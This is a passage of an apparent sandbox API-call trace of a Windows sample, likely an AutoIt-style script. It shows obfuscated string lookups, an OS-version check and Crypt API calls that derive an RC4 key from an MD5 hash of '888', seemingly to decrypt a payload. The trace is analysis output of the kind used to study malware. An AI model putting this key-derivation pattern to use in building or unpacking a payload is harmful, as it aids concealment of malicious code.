HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0209.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0209.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.620] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.620] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.620] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0209.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0209.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.620] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.620] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0209.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0209.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0209.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0209.620] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0209.620] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0209.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0209.621] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.628] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.628] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.628] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.628] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0209.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0209.628] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.628] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.628] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0209.628] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.628] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0209.628] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0209.628] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0209.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f40, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0209.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0209.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7000, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0209.629] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7bcd0) returned 1 [0209.629] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.629] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.629] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0209.629] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.629] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0209.629] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.629] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.630] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.630] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.630] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.630] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.630] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0209.630] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.630] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0209.630] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.630] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.630] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.630] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.630] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.630] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.630] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.630] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0209.630] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.630] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0209.630] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.630] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.630] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.630] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.630] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.630] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.630] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.631] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0209.631] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.631] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0209.631] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.631] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.631] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.631] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.631] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.631] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.631] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.631] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.631] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.631] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0209.631] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.631] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0209.631] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.631] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.631] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.631] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.631] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.631] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.631] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.631] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.632] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.632] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.632] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.632] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0209.632] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.632] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0209.632] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.632] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.632] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0209.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0209.632] CryptCreateHash (in: hProv=0xa7bcd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0209.632] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.632] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.632] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.632] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0209.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71c18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0209.632] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0209.632] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0209.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71c48, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0209.633] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.633] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.633] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.633] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.633] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.633] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.633] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0209.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab248, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0209.633] CryptHashData (hHash=0x9e2238, pbData=0x2a71c28, dwDataLen=0x3, dwFlags=0x1) returned 1 [0209.633] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.633] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.633] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.633] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.633] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.633] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.633] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.633] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.633] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0209.633] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.633] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0209.633] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.633] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.633] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0209.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab1a0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0209.634] CryptDeriveKey (in: hProv=0xa7bcd0, Algid=0x6601, hBaseData=0x9e2238, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1cf8) returned 1 [0209.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.634] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.634] PeekMessageW (in: 